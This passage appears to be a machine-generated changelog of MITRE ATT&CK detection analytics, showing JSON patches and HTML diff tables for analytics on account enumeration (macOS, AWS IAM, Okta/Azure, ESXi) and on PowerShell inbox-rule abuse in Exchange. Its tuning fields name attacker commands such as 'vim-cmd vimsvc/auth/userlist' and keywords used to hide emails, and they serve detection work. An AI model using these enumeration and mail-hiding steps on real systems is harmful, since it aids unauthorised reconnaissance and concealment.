                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:24:28.695000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of account enumeration through directory service queries or system utilities accessing account metadata stores, followed by structured enumeration output.\", \"old_value\": \"Detection of user account enumeration through tools like dscl, dscacheutil, or loginshell enumeration via command-line.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0\", \"name\": \"macos:unifiedlog\", \"channel\": \"DirectoryService queries retrieving account information\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to52__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to52__0\"><a href=\"#difflib_chg_to52__top\">t</a></td><td class=\"diff_header\" id=\"from52_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;user&nbsp;account&nbsp;enumeration&nbsp;through&nbsp;tools&nbsp;like&nbsp;dsc</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to52__top\">t</a></td><td class=\"diff_header\" id=\"to52_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;account&nbsp;enumeration&nbsp;through&nbsp;directory&nbsp;service&nbsp;q</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">l,&nbsp;dscacheutil,&nbsp;or&nbsp;loginshell&nbsp;enumeration&nbsp;via&nbsp;command-line.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ueries&nbsp;or&nbsp;system&nbsp;utilities&nbsp;accessing&nbsp;account&nbsp;metadata&nbsp;stores</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;followed&nbsp;by&nbsp;structured&nbsp;enumeration&nbsp;output.</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a09ed72b-be04-475f-8c0a-11ed47b40bd1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 23:17:37.896000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0192#AN0551",
                            "external_id": "AN0551"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 0551",
                    "description": "Suspicious creation or modification of inbox rules through PowerShell (New-InboxRule, Set-InboxRule) to automatically delete, move, or hide emails. Defender perspective: unusual rule activity correlated with mailbox access and filtering patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "m365:unified",
                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "SuspiciousKeywords",
                            "description": "Keywords like 'phish', 'malware', 'suspicious' used in inbox rules to hide emails."
                        },
                        {
                            "field": "UserContext",
                            "description": "Scope mailbox monitoring to high-value users such as executives or admins."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:17:37.896000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_log_source_references'][0]['name']\": {\"new_value\": \"WinEventLog:PowerShell\", \"old_value\": \"WinEventLog:Security\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--5d7158ce-17f5-4643-bde2-c0a4f2ba0b73",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:30:14.543000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1615",
                            "external_id": "AN1615"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1615",
                    "description": "Detection of enumeration of identity entities through cloud provider APIs where principals retrieve account metadata such as IAM users or roles in rapid succession.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                            "name": "AWS:CloudTrail",
                            "channel": "DescribeUsers / ListUsers / GetUser"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "API_Method",
                            "description": "Tune based on which IAM APIs are used and their frequency."
                        },
                        {
                            "field": "CallerType",
                            "description": "Differentiate user-initiated from automated/scripted enumeration."
                        }
                    ],
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:30:14.543000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of enumeration of identity entities through cloud provider APIs where principals retrieve account metadata such as IAM users or roles in rapid succession.\", \"old_value\": \"Detection of API calls listing users, IAM roles, or groups in cloud environments.\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to61__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to61__0\"><a href=\"#difflib_chg_to61__top\">t</a></td><td class=\"diff_header\" id=\"from61_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;API&nbsp;calls&nbsp;listing&nbsp;users,&nbsp;IAM&nbsp;roles,&nbsp;or&nbsp;groups&nbsp;i</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to61__top\">t</a></td><td class=\"diff_header\" id=\"to61_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;enumeration&nbsp;of&nbsp;identity&nbsp;entities&nbsp;through&nbsp;cloud&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">n&nbsp;cloud&nbsp;environments.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">provider&nbsp;APIs&nbsp;where&nbsp;principals&nbsp;retrieve&nbsp;account&nbsp;metadata&nbsp;suc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h&nbsp;as&nbsp;IAM&nbsp;users&nbsp;or&nbsp;roles&nbsp;in&nbsp;rapid&nbsp;succession.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--cb177f89-c8a4-4233-a2e4-3fdd02dccba1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:29:39.660000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1616",
                            "external_id": "AN1616"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1616",
                    "description": "Detection of identity directory enumeration through API calls or administrative queries retrieving multiple account objects within a short interval.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                            "name": "azure:signinlogs",
                            "channel": "Graph API Query"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
                            "name": "saas:okta",
                            "channel": "User Enumeration Events"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "QueryType",
                            "description": "Detect user vs role enumeration. Tune based on query scope."
                        },
                        {
                            "field": "AppContext",
                            "description": "Correlate enumeration with unexpected app registrations or identities."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Identity Provider"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:29:39.660000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of identity directory enumeration through API calls or administrative queries retrieving multiple account objects within a short interval.\", \"old_value\": \"Enumeration of user or role objects via IdP API endpoints or LDAP queries.\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to60__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to60__0\"><a href=\"#difflib_chg_to60__top\">t</a></td><td class=\"diff_header\" id=\"from60_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Enumeration&nbsp;of&nbsp;user&nbsp;or&nbsp;role&nbsp;objects&nbsp;via&nbsp;IdP&nbsp;API&nbsp;endpoints&nbsp;or</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to60__top\">t</a></td><td class=\"diff_header\" id=\"to60_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;identity&nbsp;directory&nbsp;enumeration&nbsp;through&nbsp;API&nbsp;call</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;LDAP&nbsp;queries.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;or&nbsp;administrative&nbsp;queries&nbsp;retrieving&nbsp;multiple&nbsp;account&nbsp;obje</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cts&nbsp;within&nbsp;a&nbsp;short&nbsp;interval.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c4973f27-c8db-4478-aaf8-eb73580fceec",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:28:56.147000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1617",
                            "external_id": "AN1617"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1617",
                    "description": "Detection of enumeration activity when system processes query ESXi host account configuration or management APIs to retrieve user account listings.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "esxi:vpxd",
                            "channel": "vCenter Management"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CommandPattern",
                            "description": "Tune based on known enumeration commands: 'vim-cmd vimsvc/auth/userlist'."
                        },
                        {
                            "field": "PrivilegedSession",
                            "description": "Elevated enumeration from vpxuser or root may indicate threat activity."
                        }
                    ],
                    "x_mitre_platforms": [
                        "ESXi"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:28:56.147000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of enumeration activity when system processes query ESXi host account configuration or management APIs to retrieve user account listings.\", \"old_value\": \"Account enumeration via esxcli, vim-cmd, or API calls to vSphere.\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to62__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to62__0\"><a href=\"#difflib_chg_to62__top\">t</a></td><td class=\"diff_header\" id=\"from62_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Account&nbsp;enumeration&nbsp;via&nbsp;esxcli,&nbsp;vim-cmd,&nbsp;or&nbsp;API&nbsp;calls&nbsp;to&nbsp;vSp</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to62__top\">t</a></td><td class=\"diff_header\" id=\"to62_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;enumeration&nbsp;activity&nbsp;when&nbsp;system&nbsp;processes&nbsp;quer</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">here.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;ESXi&nbsp;host&nbsp;account&nbsp;configuration&nbsp;or&nbsp;management&nbsp;APIs&nbsp;to&nbsp;retr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ieve&nbsp;user&nbsp;account&nbsp;listings.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--193167de-400a-4ea3-a8db-93e4bf628068",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-10-21 15:10:28.402000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0808#AN1940",
                            "external_id": "AN1940"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1940",
                    "description": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['description']\": {\"new_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"old_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to54__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to54__0\"><a href=\"#difflib_chg_to54__top\">t</a></td><td class=\"diff_header\" id=\"from54_1\">1</td><td nowrap=\"nowrap\">Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibility</td><td class=\"diff_next\"><a href=\"#difflib_chg_to54__top\">t</a></td><td class=\"diff_header\" id=\"to54_1\">1</td><td nowrap=\"nowrap\">Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibility</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behavi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behavi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">relating&nbsp;to&nbsp;the&nbsp;potential&nbsp;use&nbsp;of&nbsp;exploits&nbsp;for&nbsp;vulnerabilitie</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">relating&nbsp;to&nbsp;the&nbsp;potential&nbsp;use&nbsp;of&nbsp;exploits&nbsp;for&nbsp;vulnerabilitie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facing&nbsp;Application](https://attack.m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facing&nbsp;Application](https://attack.m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itre.org/techniques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Executi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itre.org/techniques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Executi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on](https://attack.mitre.org/techniques/T1203),&nbsp;[Exploitatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on](https://attack.mitre.org/techniques/T1203),&nbsp;[Exploitatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;for&nbsp;Privilege&nbsp;Escalation](https://attack.mitre.org/techniq</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;for&nbsp;Privilege&nbsp;Escalation](https://attack.mitre.org/techniq</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1068),&nbsp;[Exploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1068),&nbsp;[Exploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/techniques/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/techniques/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Access](https://attack.mitre.org/techniques/T1212),&nbsp;[Exploit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">https://attack.mitre.org/techniques/T1212),&nbsp;[Exploitation&nbsp;of</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;of&nbsp;Remote&nbsp;Services](https://attack.mitre.org/technique</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Remote&nbsp;Services](https://attack.mitre.org/techniques/T1210)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s/T1210),&nbsp;and&nbsp;[Application&nbsp;or&nbsp;System&nbsp;Exploitation](https://a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;and&nbsp;[Application&nbsp;or&nbsp;System&nbsp;Exploitation](https://attack.mi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttack.mitre.org/techniques/T1499/004)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tre.org/techniques/T1499/004)).</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--41990c88-06e2-4453-88bf-6bebe776a9a1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-10-21 15:10:28.402000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0827#AN1959",
                            "external_id": "AN1959"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1959",
                    "description": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['description']\": {\"new_value\": \"\\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"old_value\": \"\\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,2 @@\\n \\n-Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit 